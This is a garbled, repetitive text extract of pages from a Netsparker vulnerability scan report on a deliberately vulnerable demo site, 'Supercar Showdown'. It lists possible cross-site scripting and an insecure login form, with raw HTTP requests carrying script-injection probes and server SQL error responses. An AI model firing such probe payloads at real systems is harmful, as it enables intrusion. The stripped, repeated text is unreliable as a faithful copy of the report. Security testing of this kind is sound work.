ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
